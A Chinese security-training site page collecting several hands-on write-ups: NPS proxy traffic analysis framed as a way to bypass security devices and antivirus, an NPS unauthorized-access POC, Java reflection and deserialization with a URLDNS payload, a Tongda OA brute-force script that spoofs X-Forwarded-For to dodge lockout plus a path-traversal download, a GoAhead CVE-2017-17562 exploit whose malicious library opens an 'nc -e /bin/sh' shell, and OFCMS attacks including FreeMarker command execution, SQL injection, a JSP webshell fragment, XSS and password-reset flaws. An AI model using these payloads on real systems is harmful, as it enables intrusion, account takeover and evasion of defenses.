蚁景网安 - 网络安全人才培养服务提供商

NPS之Socks流量分析以及未授权复现

前言因为想要写一个socks的流量算法去绕过安全设备，所以这里对nps的流量特征总结一下，方便自己后期的魔改。环境 ubuntu 16.04 vps server windows server 2012R2 clinet mkdir nps cd nps wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz tar -zxvf linux_amd64_server.tar.gz ./nps install cd /etc/nps/conf/ vim nps.conf 配置文件 #web web_host=a.o.com web_username=xxxx //管理端用户名 web_password=xxxxxx //管理端密码 web_port = xxxxx //管理端端口 web_ip=0.0.0.0 web_base_url= web_open_ssl=false web_cert_file=conf/server.pem web_key_file=conf/server.key #web_base_url=/nps ##bridge bridge_type=tcp //客户端连接协议tcp bridge_port=xxxx //客户端连接端口 bridge_ip=0.0.0.0 bridge_port的默认端口默认为8024，这里不建议改为默认的，连接客户端的时候可能会触发安全设备规则 NPS未授权复现 POC #encoding=utf-8 import time import hashlib now = time.time() m = hashlib.md5() m.update(str(int(now)).encode("utf8")) auth_key = m.hexdigest() print("Index/Index?auth_key=%s&timestamp=%s" % (auth_key,int(now)) 直接访问 http://vps:port?payload exp请求接口 POST /client/list HTTP/1.1 Host: vps:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 98 Origin: http://vps:port Connection: close Referer: http://vps:port/client/list search=&order=asc&offset=0&limit=10&auth_key=805df7d1f7bf3b662939ca091174e6b4&timestamp=1659948547 参考链接： https://mp.weixin.qq.com/s/PTq01wcV4XJwutbSjHjfvA修复措施 vim /etc/nps/conf/nps.conf取消注释auth_key,添加auth_crypt_key`注释 auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN 修改为 auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN 目前最新版本的也存在改配置不当问题，这里需要修改配置，修复之后是无法通过未授权读取内容信息的。 socks流量分析 nps start 访问http://vps:port/login 新增客户端这里用户名和密码随意，这里是客户端登录的认证用户名，在客户端连接的时候是根据密钥来实现的。客户端选择windwos server 2012R2 修改客户端配置文件 [common] server_addr=vps:port conn_type=tcp vkey=xxxx auto_reconnection=true max_conn=1000 flow_limit=1000 rate_limit=1000 basic_username=11 basic_password=3 web_username=xxxx web_password=xxxxx crypt=true compress=true #pprof_addr=0.0.0.0:9999 disconnect_timeout=60 客户端启动 npc.exe -server=vps:port -vkey=xxxxx -type=tcp 正常情况下会报毒，所以这里针对杀软这一块儿，客户端需要做一下免杀处理。查看连接状态使用goby测试socks5 测试代理已成功实现内网穿透。这里使用wireshark抓取流量包，初始流量服务器向客户端发送TST 同时客户端向服务端确认版本，同时返回客户端版本0.26.0 代码位置nps/lib/version/version.go 服务端接收到请求后，客户端请求的数据内容为nps的版本为0.26.10 服务端接收到请求后返回给客户端服务端版本的md5值，即 md5(0.26.0)=89a4f3fc3c89257d6f712de6964bda8e 可以发现在产生nps客户端连接的时候,会产生数据校验，这里数据校验就是有服务器到这是客户端传输给服务端密钥连接 md5(vkey) 服务端在接收到客户端的请求后校验数据后返回success 这里客户端和服务端的连接流量就比较清晰了，那么想要bypass安全设备的告警，在修改加密方式和修改版本关键字即可，因为在做流量隐藏的时候跟bypassav不一样，不会考虑文件的哈希以及文件在沙箱中的落地状态。

实例解析Java反射

反射是大多数语言里都必不不可少的组成部分，对象可以通过反射获取他的类，类可以通过反射拿到所有方法（包括私有），拿到的方法可以调用，总之通过“反射”，我们可以将Java这种静态语言附加上动态特性。什么是反射 java的反射是指在运行状态中，对于任意一个类都能够知道这个类所有的属性和方法，并且对于任意一个对象。基本形式 public void execute(String className, String methodName) throws Exception { Class clazz = Class.forName(className); clazz.getMethod(methodName).invoke(clazz.newInstance()); } 上面的例子中，我演示了几个在反射里极为重要的方法：获取类的方法： forName实例例化类对象的方法： newInstance获取函数的方法： getMethod执行函数的方法： invoke 反射的作用：让Java具有动态性，修改已有对象的属性，动态生成对象，动态调用方法，操作内部类和私有方法在反序列化漏洞中的应用定制需要的对象，通过invoke调用除了同名函数以外的函数，通过class类创建对象，引入不能序列化的类 java反射举例此处引用白日梦组长的例子，具体讲解一下反射。先写一个Person作为我们下面演示的原型类 public class Person { private String name; public int age; public void act(){ System.out.println("test"); } @Override public String toString() { return "Persion{" + "name='" + name + '\'' + ", age=" + age + '}'; } public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } public Person() { } public Person(String name, int age) { this.name = name; this.age = age; } } 获取原型类使用forName方法 Class c = Class.forName("Person"); 在此也写一种基于ClassLoader的动态类加载方式 this.getClass().getClassLoader().loadClass("Person"); 从原型class里面实例化对象利用构造函数实例化 Constructor constructor = c.getConstructor(String.class,int.class); Person p1 = (Person) constructor.newInstance("abc",22); 我们来逐行写一下分析 Constructor constructor = c.getConstructor(String.class,int.class); 这一行是为了获取原型类中重载的构造方法 public Person(String name, int age) { this.name = name; this.age = age; } 对构造方法进行传参实例化一个对象 Person p1 = (Person) constructor.newInstance("abc",22); 我们可以打印一下p1看一下返回结果获取类里面的属性 private String name; public int age; public Field ageField = c.getField("age"); ageField.set(p1,11); private Field nameField = c.getDeclaredField("name"); nameField.setAccessible(true); nameField.set(p1,"xinyuan"); 获取类方法 Method actmethod = c.getMethod("act",String.class); actmethod.invoke(p1,"SKyMirror"); getMethod 与上面的获取构造函数类似，第一个参数是函数名，第二个是传参的类型 invoke方法第一个传入对象，第二个是传入参数值利用URLDNS（反射）这条链子算是反射的一个简单应用。利用点 URL这个类重写了hashCode方法，导致在执行hashCode的时候，此利用点不能命令执行，但是会请求DNS，所以被用来验证是否存在反序列化漏洞。源码如下：可以看到当我们调用一次hashCode方法，他会对传进去的URL对象发起请求，即我们如果去DNSLOG申请一个地址，根据访问来判断是否成功执行了hashCode方法进而判断是否执行了反序列化的操作。 URL这个类实现了java.io.Serializable，可以进行序列化的操作。因此，在这里我们可以验证一下我们上面的想法。链子这个链子也比较短，比较简单，主要是利用HashMap来执行hashCode方法 HashMap实现了Serializable可以序列化，此处注意反序列化时HashMap的readObject方法我们跟进一下hash方法 key参数可控，key又是由反序列化的时候生成的。在HashMap中用put传入一个URL的对象，即可在反序列化的时候调用到此方法，从而触发整个链子。有一点需要注意，我们在序列化的时候，进行的put传参会修改掉传入的URL对象的hashCode的值，因为hashCode值不等于-1，从而导致无法正常触发下面的方法，即无法触发DNS请求。同时在正常put传参的时候会执行一次DNS请求，所以我们在put传参之前修改hashCode的值（不为-1就行），传参之后修改hashCode为-1，在反序列化的时候就可以正常执行了。 payload如下 public static void main(String[] args) throws Exception{ HashMap <URL,Integer> hashMap = new HashMap<>(); URL u = new URL("http://i2loelbsvarbmabqf89qi9k88zep2e.burpcollaborator.net/"); Class c = u.getClass(); //在进行put方法传参之前修改URL对象的hashCode值 Field hashcodeField = c.getDeclaredField("hashCode"); hashcodeField.setAccessible(true); hashcodeField.set(u,123); hashMap.put(u,123); //修改URL对象的hashCode值为-1 hashcodeField.set(u,-1); serialize(hashMap); }

Java反序列化之原生

早就想学java安全，但一直无从下手，今天下定决心好好学习，当然以下内容可能会有些许错误，小白的烦恼。序列化与反序列化 Java序列化是指把Java对象转换为字节序列的过程；而Java反序列化是指把字节序列恢复为Java对象的过程。序列化分为两大部分：序列化和反序列化。序列化是这个过程的第一部分，将数据分解成字节流，以便存储在文件中或在网络上传输。反序列化就是打开字节流并重构对象。对象序列化不仅要将基本数据类型转换成字节表示，有时还要恢复数据。恢复数据要求有恢复数据的对象实例。为什么需要序列化与反序列化我们知道，当两个进程进行远程通信时，可以相互发送各种类型的数据，包括文本、图片、音频、视频等，而这些数据都会以二进制序列的形式在网络上传送。那么当两个Java进程进行通信时，能否实现进程间的对象传送呢？答案是可以的。如何做到呢？这就需要Java序列化与反序列化了。换句话说，一方面，发送方需要把这个Java对象转换为字节序列，然后在网络上传送；另一方面，接收方需要从字节序列中恢复出Java对象。当我们明晰了为什么需要Java序列化和反序列化后，我们很自然地会想Java序列化的好处。其好处一是实现了数据的持久化，通过序列化可以把数据永久地保存到硬盘上（通常存放在文件里），二是，利用序列化实现远程通信，即在网络上传送对象的字节序列。 ① 想把内存中的对象保存到一个文件中或者数据库中时候；② 想用套接字在网络上传送对象的时候；③ 想通过RMI传输对象的时候为什么会产生安全问题？只要服务端反序列化数据，客户端传递类的readObject中代码会自动执行，给予攻击者在服务器上运行代码的能力。几种常见的序列化和反序列化协议 XML&SOAP JSON Protobuf 理解类比快递、打包和拆包有些快递打包和拆包时有独特需求、比如易碎朝上，类比重写writeObject和readObject 实例 Java反序列化的操作，很多是需要开发者深入参与的，所以你会发现大量的库会实现readObject 、writeObject 方法，这和PHP中__wakeup 、__sleep 很少使用是存在鲜明对比的。我在《Java安全漫谈 - 06.RMI篇(3)》的最后一部分，讲到了classAnnotations ，这次再来说说objectAnnotation 。Java在序列化时一个对象，将会调用这个对象中的writeObject 方法，参数类型是ObjectOutputStream ，开发者可以将任何内容写入这个stream中；反序列化时，会调用readObject ，开发者也可以从中读取出前面创建一个person类 import java.io.IOException; import java.io.ObjectInputStream; import java.io.Serializable; public class Person implements Serializable { private String name; private int age; public Person(){} public Person(String name,int age){ this.name=name; this.age=age; } @Override public String toString() { return "Person{"+ "name='" + name + "\'" + ",'age=" + age + '}'; } } 创建一个序列化类 import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; public class SerializationTest { public static void serialize(Object obj) throws IOException { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static void main(String[] args) throws Exception{ Person person=new Person("xinyuan",22); serialize(person); System.out.println(person); } } 创建一个反序列化类 import java.io.FileInputStream; import java.io.IOException; import java.io.ObjectInputStream; public class UnserializationTest { public static Object unserialize(String Filename) throws IOException, ClassNotFoundException { ObjectInputStream ois=new ObjectInputStream(new FileInputStream("ser.bin")); Object obj = ois.readObject(); return obj; } public static void main(String[] args) throws Exception{ Person person=(Person) unserialize("ser.bin"); System.out.println(person); } } 可能的形式 1.入口类的readObject直接调用危险方法在person类，重写readObject方法，序列化后，反序列化 2.入口类参数中包含可控类，该类有危险方法，readObject时调用。 3.入口类参数包含可控类，该类又调用其他有危险方法的类，readObject时调用条件共同条件继承Serializable 入口类 source（重写readObject 参数类型宽泛最好jdk自带） Map<Object ,Object> 调用链 gadget chain 相同名称，相同类型执行类 sink（rce ssrf 写文件等等） https://github.com/frohoff/ysoserial/

某OA系统审计小记

通达oa 作为攻防演练中出场率较高的一套 OA 系统，决定先从历史漏洞开始挖掘分析，对通达oa 有一个初步的了解。通达oa 11.9 的https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe ，默认安装地址是 D:\MYOA ，联网状态下会自动更新到通达 oa 11.10 安装成功后，登录界面如下默认账号为 admin 对应密码为空。登录后我们看到其中还有一些默认账号 lijia wangyun wangde 均可利用空密码登录成功　　爆破密码正常输入账号名密码时，输入三次错误就会禁止10分钟我们可以通过代码方面追究其原因 webroot/inc/td_core.php $USER_IP 的值可以来自于 X-Forwarded-For 写个 python 脚本用于爆破用户名密码 import requests import sys import re def read_passwd(passwordfile): with open(file = passwordfile, mode='r') as f: passwd = f.read().splitlines() return passwd def Intruder_password(url,username,passwd_list): success_str ="正在进入OA系统，请稍候..." a=b=c=d=0 url = url +"/logincheck.php" for passwd in passwd_list: payload = "UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd) headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"} response = requests.request("POST", url, data=payload, headers=headers) if(re.search(success_str, response.text)): print("正确的账号名:{}密码:{}".format(username,passwd)) else: print("错误密码:{}".format(passwd)) d=d+1 if(d == 255): c = c +1 d = 0 if(c == 255): b = b +1 c = 0 if(b == 255): a = a +1 b =0 def main(): if len(sys.argv) < 4: print("Usage: Intruder_password.py targeturl username passwdfile\n" "Example: python Intruder_password.py http://10.0.18.1:80 admin passwd.txt") exit() url = sys.argv[1] username = sys.argv[2] passwd_list = read_passwd(sys.argv[3]) Intruder_password(url,username,passwd_list) if __name__ == '__main__': main() 未授权敏感信息泄露一般我们想要寻找一些高危的漏洞，就是需要寻找一些未授权漏洞，就是在未登录状态下也可以执行授权后的相关功能，编写了一个简单的脚本，先判断哪一些网页是可以在未授权的情况下进行访问到，然后再做进一步的分析 import os import sys import requests def file_path(url,filefolder): for root, dirs, files in os.walk(filefolder): for f in files: paths = os.path.join(root,f) paths = paths.replace(filefolder,url) paths = paths.replace("\\","/") #print(paths) if(f.endswith(".php")): response = requests.get(paths) # print(str(response.status_code)+" "+str(len(response.text))+" "+paths) print("code:"+ str(response.status_code) +" len:"+ str(len(response.text))+" url: "+ paths ) def main(): if len(sys.argv) < 3: print("Usage: file_path.py targeturl filefolder\n" "Example: python file_path.py http://10.0.18.1:80 \"C:\\Users\\admin\\Desktop\\MYOA\\webroot\"") exit() url = sys.argv[1] filefolder = sys.argv[2] file_path(url,filefolder) if __name__ == '__main__': main() http://10.0.18.1/inc/reg.php 泄露版本信息还有很多可以未授权显示的页面，不一一展示了未授权文件下载通过不断测试，也找到了一个比较有价值的漏洞，就是未授权文件下载构造链接 http://10.0.18.1/inc/package/down.php?id=/../../../../../../../../../a 　　就可以下载到根目录下的 a.zip 文件我们从代码层面分析一下漏洞的成因 webroot/inc/package/down.php 我们看到通过 GET 方法获取到 id 值，拼接到 $FILE_PATH 中，并没有做任何过滤，传到函数 td_download 中 webroot/inc/utility_file.php 如此便实现了任意文件下载，这是在版本 11.09 中存在的漏洞，在自动更新到 11.10 后漏洞便被修复了，我们查看一下代码 webroot/inc/package/down.php 我们看到对传入的参数进行了过滤，无法再跨越目录的进行下载靶场实验练习推荐： https://www.yijinglab.com/expc.do?ec=ECIDb9ac-4540-46b4-b676-22df36b5935b

goahead环境变量注入漏洞分析

一、前言 1.1 下载地址二、CVE-2017-17562 2.1 漏洞分析 cve-2017-17562远程命令执行漏洞影响Goahead 2.5.0到Goahead 3.6.5之间的版本。在cgiHandler函数中，将用户的HTTP请求参数作为环境变量，通过诸如LD_PRELOAD即可劫持进程的动态链接库，实现远程代码执行。 2.2 代码分析漏洞成因位于cgiHandler函数中。代码首先拼接出用户请求的cgi完整路径并赋予cgiPath，然后检查此文件是否存在以及是否为可执行文件。随后就是存在漏洞的关键代码处，如下图所示：代码将用户请求的参数存入环境变量数组envp中，但是不能为REMOTE_HOST和HTTP_AUTHORIZATION。从这里不难看出黑名单的过滤非常有限，这也为攻击者提供了利用点。如下图所示代码继续往下执行，将webGetCgiCommName函数的返回值保存在stdIn与stdOut中，此函数将返回一个默认路径位于/tmp文件名格式cgi-*.tmp的绝对路径字符串。随后代码将cgiPath、envp、stdIn与stdOut作为参数传入launchCgi函数中。 PUBLIC char *websGetCgiCommName() { return websTempFile(NULL, "cgi"); } PUBLIC char *websTempFile(char *dir, char *prefix) { static int count = 0; char sep; sep = '/'; if (!dir || *dir == '\0') { #if WINCE dir = "/Temp"; sep = '\\'; #elif ME_WIN_LIKE dir = getenv("TEMP"); sep = '\\'; #elif VXWORKS dir = "."; #else dir = "/tmp"; #endif } if (!prefix) { prefix = "tmp"; } return sfmt("%s%c%s-%d.tmp", dir, sep, prefix, count++); } 进入launchCgi函数，根据注释可知此函数为cgi启动函数。代码首先打开了两个tmp文件，随后fork子进程并在子进程中将标准输入与标准输出重定向到两个打开的文件描述符上，最后调用execve函数在子进程中执行cgi程序。至此漏洞相关代码分析完毕，代码在执行execve函数时将cgiHandler函数解析的envp数组作为第三个参数传入，攻击者可以在请求参数时通过LD_PRELOAD环境变量配合代码重定向后/proc/self/fd/0指向POST数据实现动态链接库的劫持。 2.3 漏洞复现下载编译并通过gdb运行存在漏洞的Goahead程序（3.6.4） git clone https://github.com/embedthis/goahead.git cd goahead make cd test gcc ./cgitest.c -o cgi-bin/cgitest sudo gdb ../build/linux-x64-default/bin/goahead 编写恶意动态链接库，代码以及编译命令如下所示： #include <stdio.h> #include <stdlib.h> static void main(void) __attribute__((constructor)); static void main(void) { system("nc -lp 8888 -e /bin/sh"); } // gcc --shared -fPIC poc.c -o poc.so 构造HTTP请求发送 curl -vv -XPOST --data-binary @./poc.so localhost/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 断点下在execve函数处，此时内存情况如下图所示，envp数组中存在我们注入的恶意环境变量LD_PRELOAD并指向/proc/self/fd/0文件。在代码分析中我们了解到，launchCgi函数会在子进程中将标准输入输出重定向到cgi-*.tmp的文件描述符，而根据以往的经验POST数据会作为cgi的标准输入，也就是说此时/proc/self/fd/0所指向的正是我们的恶意文件poc.so，当execve函数执行时，即可劫持进程动态链接库实现RCE。 2.4 补丁分析首先是在cgiHandler函数中添加了更加完整的过滤检测，使得LD_开头的字符串无法写入envp数组。其次是增加了一层if判断，当s-arg不为0时进行字符串拼接。根据索引找到s-arg的赋值语句位于addFormVars函数中，此函数是Goahead处理content-type为application/x-www-form-urlencoded的HTTP请求时会调用。三、cve-2021-42342 3.1 漏洞分析 cve-2021-42342远程命令执行漏洞影响Goahead 4.X和部分Goahead 5.X版本。在分析cve-2017-17562的补丁时我们了解到新版的程序对黑名单的完整性上做了优化，然而在4.X版本中增加了一句strim函数对用户参数的处理，如下图所示：进入这个函数，当第二个参数为0时return 0。因为开发人员对于strim函数使用规范的错误使得针对cve-2017-17562的黑名单完善形同虚设。上文在对cve-2017-17562补丁进行分析时曾经提到，s-arg在addFormVars函数中赋值为1，为了实现环境变量注入则必须使s-arg为0，绕过的方式也很简单令header中content-type为multipart/form-data即可。后续利用方式与cve-2017-17562相同，笔者就不做重复分析了。 3.2 代码分析为了更好的了解漏洞的完整执行流程，这里笔者针对Goahead处理Http的机制进行深入分析，其中不对的地方欢迎师傅们指正。在Goahead进行启动后会执行websServer函数进行初始化操作。其中websOpen函数对route.txt文件进行解析，关于route处理可以看一下https://www.cnblogs.com/zongzi10010/p/12109380.html师傅的文章。 websOpen函数会根据配置启动相应的代码模块其中关于cgi请求的回调函数通过websDefineHandler函数定义。 websOpen函数执行完毕后返回websServer函数并调用websListen启动HTTP服务。代码如下所示，当接收到HTTP请求时调用回调函数websAccept函数进行处理。在websAccept函数中调用websAlloc函数为请求分配内存地址，添加入webs列表中。其中websAlloc函数调用initWebs函数对Webs结构体进行初始化。此时Goahead完成了对Http请求的初始化操作，而针对Http请求的处理工作则是通过执行websAccept->socketEvent->readEvent完成响应的调用websRead函数将数据写入到wp->rxbuf缓冲区中，随后执行websPump函数。如下图所示，在Goahead中将HTTP的处理流程分为了五个状态，每个状态由不同的函数进行配置和处理工作。 3.2.1 WEBS_BEGIN WEBS_BEGIN阶段由parseIncoming函数负责处理，代码如下图所示。其中我们需要重点关注调用的三个函数parseFirstLine、parseHeaders、websRouteRequest函数。 parseFirstLine函数负责将请求的类型、url、协议版本和请求参数保存在wp结构体中 parseHeaders函数负责对请求头进行解析，其中对请求头中content-type键处理流程如下图所示。为了满足漏洞的触发条件s->arg为0，所以我们需要绕过addFormVars函数，即请求头content-type为multipart/form-data。函数用于确定HTTP请求的处理函数。通过url路径与route->prefix进行比较确定最终处理函数，并将结果保存在wp->route中。其中routes数组保存了route.txt文件解析后，所有处理函数的相关数据。调用websGetCgiCommName函数创建文件名格式为cgi-*.tmp的临时文件用于保存POST数据。 3.2.2 WEBS_CONTENT 返回websPump函数，随后调用processContent函数。函数部分代码如下所示，其中filterChunkData函数检测数据是否全部处理完毕，websProcessUploadData函数为处理上传文件的函数。进入函数后可以看到上传操作被分为五个状态，每种状态由专门的函数负责处理，如下图所示。 initUpload函数切换wp->uploadState状态为initUpload，初始化上传路径并确定上传请求边界符。 processContentBoundary函数判断数据是否已经处理完毕，若是则将状态切换为UPLOAD_CONTENT_END，若还有数据未处理完成则切换状态为UPLOAD_CONTENT_HEADER。 processUploadHeader函数通过调用websTempFile函数创建用于暂存上传数据的临时文件，文件名格式/tmp/tmp-*.tmp，将临时文件的文件描述符保存在wp 当全部数据处理完毕后wp->eof置1，wp->state状态更改为WEBS_READY。返回processContent函数后继续执行，调用websProcessCgiData函数将POST数据保存在临时文件cgi-*.tmp中 3.2.3 WEBS_READY 程序流程返回websPump函数后，在WEBS_READY阶段调用websRunRequest函数，此函数主要负责切换wp->state为WEBS_RUNNING，并调用cgiHandler函数。在代码执行到漏洞位置时，s->arg值为零完成绕过。后续的利用原理与cve-2017-17562类似，这里就不过多赘述。

OAuth2.0协议安全学习

细说从0开始挖掘CMS

前言挖了一些phpcms的漏洞了，突然想尝试去挖一下javacms的漏洞，于是写下这篇文章来记录一下自己挖洞的一个流程，希望能帮助到一些正在学习挖洞的师傅们。确立目标挖洞的第一步首先是确立一个目标，也就是找个cms来挖，这里可以通过github，gitee或者谷歌百度直接去搜cms。如果挖洞经验比较少的话建议找一下star少的cms去挖，找到相应的项目，然后点进去，下载源码，然后看项目的介绍，大致了解一下项目的信息和安装的过程。信息收集如果确定了目标，接下来我们可以去了解一下他的项目信息，相应的漏洞等。项目信息除了上面的README以为还可以看看issues模块，这里可能会有一些系统问题或者安装问题，后续我们可能会遇到漏洞信息的话可以通过cnvd或者其他漏洞平台（直接百度也可以）去查看该系统的漏洞情况。或者cnvd查看相应的信息，通过查看相应的信息可以提高我们挖洞的效率，我们从中可以知道该项目已经存在漏洞，我们到时候挖就可以看看相应的地方会不会还存在漏洞或者避免挖到别人挖过的漏洞。环境搭建上面的信息收集完之后我们就要开始搭建环境了，搭建环境是很关键的一步，由于某些cms安装过程繁琐或者没写好说明，会导致安装出现很多问题甚至装不上，这里我们要注意项目的文档，如果实在安装有问题可以通过相关渠道去联系一下作者或者相应的qq群寻求一下帮助。本次挖掘的漏洞是ofcms，首先先下载一下源码，然后解压丢一边，回到网页来看一下项目文档。环境要求一般项目都会有写环境要求的，我们调整一下就好。环境准备环境解压完我们用idea打开，如果发现一些重要目录文件不见了，重开一下就有了。数据库首先找到db.properties，如果不能一眼看到可以通过ctrl+shift+f来快速搜索 /ofcms-admin/src/main/resources/dev/conf/db.properties 找到了文件，访问相对应的路径即可，这里我们修改一下数据库用户名和密码，然后点击右边的数据库来测试连接。然后按数据库信息来修改，然后点击右边的数据库，配置一下。如果出现以下的错误 Server returns invalid timezone. Go to 'Advanced' tab and set 'serverTimezone' property manually. 这是时区问题，如果配置了环境变量报错，可以通过以下步骤来解决。 win+R cmd mysql -hlocalhost -uroot -p （然后输入数据库密码） show variables like'%time_zone'; set global time_zone = '+8:00'; 没配置环境变量的，看这个文章 https://blog.csdn.net/liuqiker/article/details/102455077配置成功效果图如下 maven 右键项目找到mavne重新加载项目即可 tomcat 在run-configuration中配置tomcat 在Deployment配置一下一切配置好后点击run启动就可以了，如果遇到端口报错改一下端口，其他的报错就百度一下。安装过程这一步就比较简单了，跟着弄就好了。下一步，然后配置好数据库，这里记得先在数据库中新建个ofcms的库，否则会报Unknown database 'ofcms'的错。在这里，正常安装步骤是建立好数据库，输入账号密码就等待安装就好。如果出现以下报错，我们可以通过手工导入数据库，这一种情况在安装别的cms也很常见，在安装遇到数据库问题我们可以直接导入数据库。 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE IF EXISTS `of_cms_access`; CREATE TABLE `of_cms_access` ( `access_i' at line 21 数据库位置ofcms-master\doc\sql，选择相应的版本直接拖进navicat中，然后导入成功后刷新一下就好。接着将数据库配置文件db-config.properties文件名修改为db.properties，重启一下服务。漏洞复现环境搭建完，我们就可以开始挖洞了，然后在这里我建议是能找到该漏洞已存在的文章，我们就先去复现一下，看看别的师傅们的挖过的漏洞，一方面是防止重复，一方面是可以学习一下别人的挖洞思路。 ofcms其实存在挺多漏洞的，这里我们就来简单复现一下，大致看看师傅们的挖洞思路。任意文件写入漏洞模板文件这个位置，漏洞的详细分析可以看看https://blog.csdn.net/xd_2021/article/details/123611835 漏洞复现我们选择任意一个html，然后点击保存抓包，我们可以看到包的信息。这里就是写入文件，我们在admin目录下写入eek1.xml文件。通过上面任意文件读取漏洞去读取一下模板注入漏洞漏洞在模板注入，这个漏洞主要是pom.xml引入了freemarker-2.3.21依赖，但是留下一些不安全因素导致的，具体漏洞分析可以看这篇http://www.wjhsh.net/bmjoker-p-13653563.html。漏洞复现漏洞复现过程比较简单，我们直接在html文件中插入payload就可以了 <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") } 插入后直要访问前台就会出发payload 模板注入的知识点可以看看这篇https://blog.csdn.net/weixin_44522540/article/details/122844068 通过这一个洞，我们可以挖洞的时候可以去注意一下pom.xml引入的模板。 SQL注入漏洞漏洞分析参考https://blog.csdn.net/xd_2021/article/details/123611835，由于这里的预编译处理不起作用，所以可以执行SQL语句。漏洞复现漏洞点在系统设置---代码生成---添加----添加表，在这里抓一下包直接把payload输进来 update of_cms_ad set ad_id=updatexml(1,concat(1,user()),1) 任意文件上传漏洞分析在上一篇文章里有说，这里主要就是利用windows或中间件文件上传特性来避免结尾为jsp或jspx 漏洞复现找到一个上传点然后抓包，我这里是在内容管理----栏目管理----新增----新增用户----上传附件这里抓包的。 eek.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);sessio 可以看到文件上传进去，而且内容没被修改。漏洞挖掘通过上面的内容，我们学习了别的师傅的挖洞思路，接下来就是我自己的挖洞过程了，下面是我挖的几个洞。首先除了已经存在的漏洞外，我们要大致知道什么漏洞会存在什么地方，例如登录注册界面会出现sql漏洞，逻辑漏洞等，留言框可能会出现xss漏洞，上传头像界面可能会出现任意文件上传漏洞等，信息泄露漏洞也可以通过御剑或者其他工具去扫一下。 XSS漏洞漏洞复现对于前台有个客户案例，选择其中一个案例，然后有个留言框，这里直接打入xss的payload就可以了。 <video src=x onerror=alert("eek") /> 漏洞分析文件位置ofcms-master\ofcms-api\src\main\java\com\ofsoft\cms\api\v1 package com.ofsoft.cms.api.v1; import com.jfinal.plugin.activerecord.Db; import com.ofsoft.cms.api.ApiBase; import com.ofsoft.cms.core.annotation.Action; import com.ofsoft.cms.core.api.ApiMapping; import com.ofsoft.cms.core.api.RequestMethod; import com.ofsoft.cms.core.api.check.ParamsCheck; import com.ofsoft.cms.core.api.check.ParamsCheckType; import com.ofsoft.cms.core.utils.IpKit; import java.util.Map; /** * 评论接口 * * @author OF * @date 2019年2月24日 */ @Action(path = "/comment") public class CommentApi extends ApiBase { /** * 获取内容信息 */ @ApiMapping(method = RequestMethod.GET) @ParamsCheck( {@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"), @ParamsCheckType(name = "site_id")}) public void save() { try { Map params = getParamsMap(); params.put("comment_ip", IpKit.getRealIp(getRequest())); Db.update(Db.getSqlPara("cms.comment.save", params)); rendSuccessJson(); } catch (Exception e) { e.printStackTrace(); rendFailedJson(); } } } 请求/api/v1/comment/save.json?comment_content=123&content_id=61&site_id=1&check_status=1&_=1644130926694 这里直接接受请求，未对content的内容进行检测，直接将请求的值存入数据库中，导致存在跨站脚本漏洞。逻辑缺陷漏洞1 本地环境现有两个用户信息，系统管理员admin和普通管理员eek，如下是系统管理员的界面。 admin/admin eek/123 超级管理员后台界面。普通管理员后台界面漏洞复现我们先以普通管理员登录点击右上角，修改密码在此处burp抓包修改id为1，密码任意修改前admin的密码是admin 修改后为admin，密码是eek 漏洞分析漏洞文件：\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的respwd方法 ... public void respwd() { Map<String, Object> params = getParamsMap(); String password = (String) params.get("password"); String newpassword = (String) params.get("newpassword"); if (!password.equals(newpassword)) { rendFailedJson("两次密码不一致!"); return; } Record record = new Record(); if (!StringUtils.isBlank(password)) { password = new Sha256Hash(password).toHex(); record.set("user_password", password); } record.set("user_id", params.get("user_id")); try { Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record); rendSuccessJson(); } catch (Exception e) { e.printStackTrace(); rendFailedJson(ErrorCode.get("9999")); } }... 在此方法中，后台对前端界面的id和两次密码值进行获取，然后传入后端，后端直接将id和密码传入数据库中，让数据库直接更新信息。这里由于id可控导致用户可以直接修改任意id的密码，导致该地方存在任意用户密码重置。逻辑缺陷漏洞2 本地环境数据库信息如下图所示现在有超级管理员，admin/123 普通管理员，eek/123 漏洞复现首先以普通管理员身份登录，然后点击右上角，基本资料在此处burp抓包修改信息，user_id改为1，密码修改为admin 以系统管理员身份登录成功登录漏洞分析漏洞文件：\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的update方法 ... public void update() { Map<String, Object> params = getParamsMap(); String password = (String) params.get("password"); if (!StringUtils.isBlank(password)) { password = new Sha256Hash(password).toHex(); params.put("user_password", password); } params.remove("password"); String roleId = (String) params.get("role_id"); if (!StringUtils.isBlank(roleId)) { SqlPara sql = Db.getSqlPara("system.user.role_update", params); Db.update(sql); } params.remove("role_id"); Record record = new Record(); record.setColumns(params); try { Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record); rendSuccessJson(); } catch (Exception e) { e.printStackTrace(); rendFailedJson(ErrorCode.get("9999")); } } ... 